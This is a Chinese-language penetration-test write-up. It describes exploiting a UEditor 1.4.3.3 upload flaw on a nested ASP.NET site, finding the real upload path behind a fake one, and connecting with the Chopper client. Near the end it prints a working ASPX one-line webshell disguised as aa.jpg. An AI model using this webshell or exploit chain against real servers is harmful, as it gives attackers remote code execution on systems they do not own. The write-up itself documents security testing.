前几天在驻场时候遇到一个套娃的站，一个站里面套了N多个站，域名相同，根据不同的子目录进行区分，由于现在已经修复了，只能尽量还原当时的场景来写这文章。

网站上传点对上传的文件进行了二次渲染，此处无法绕过，只能寻找其他突破口（因为套了不少站，浪费大量时间）。

翻功能的时候，在一个站点找到这么一个编辑器，是不是很眼熟。

通过fd抓包获取到编辑器路径为：

https://xxx.xxx.com.cn/crm9000/HtmlControl/ueditor1.4.3.3/

果断用exp去打，结果访问漏洞地址的时候，发现404。

查看上传功能，发现上传功能也无法正常使用，提示后端配置项无法正常加载。

查看配置文件，感觉也没有问题呀，此时有点郁闷。

在牧马大佬的提示下，仔细查看js和流量。首先查看js，发现此处加载了一个Add.js文件。

打开这个js文件，找到了ueditor的真实路径。

但是去访问的时候，发现地址无法访问。

通过查看加载编辑器时的网络包，可以看到这也是后端配置项无法正常加载的原因。

然后尝试直接拼接编辑器路径到域名上，发现访问成功，原来是开发配置得有问题，多加了端口。

既然能够正常访问，那我就不客气了，拿exp干他，先在服务器上丢个aa.jpg的一句话马。

上传成功，返回的路径为：upload/image/201912/11/6371165485276351045218627.aspx（记住这个该死的路径，等下要懵逼。）

接下来就是寻找路径了，我tm找了半个多小时呀，拼接了各种路径，都没找到。。。

后来实在无奈，继续去查看配置文件，看到配置文件的时候，人是懵逼的，路径是对的呀，但感觉总有哪里不对劲。

然后不信这个邪，又重新上传了一次，发现此时返回的路径是

upload/image/20191211/6371165520599596974371346.aspx

仔细一看，第一次返回的路径中多了’/‘，感情是服务端返回了一个假路径给我，难怪配置文件看着哪里不对劲，原来是路径规则。

但是访问shell的时候，报了一个错，第一次遇到这种问题。

直接在aa.jpg里面加上<head runat="server" />，再上传，浏览器访问的时候就正常了，但是菜刀连接的时候，又报了这一堆东西（同事复现的时候，菜刀直接连接成功，佛学）。

<head>
<link href="../../../../../../../App_Themes/default/default.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/EnStyle.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/Style.css" type="text/css" rel="stylesheet" /><title>

</title></head>

继续把这些加到aa.jpg内容里，最后，aa.jpg内容为：

<head runat="server" />
<link href="../../../../../../../App_Themes/default/default.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/EnStyle.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/Style.css" type="text/css" rel="stylesheet" /><title>

</title></head>

<%@ Page Language="Jscript"%><%eval(Request.Item["g"],"unsafe");%>

上传成功后，菜刀连接成功。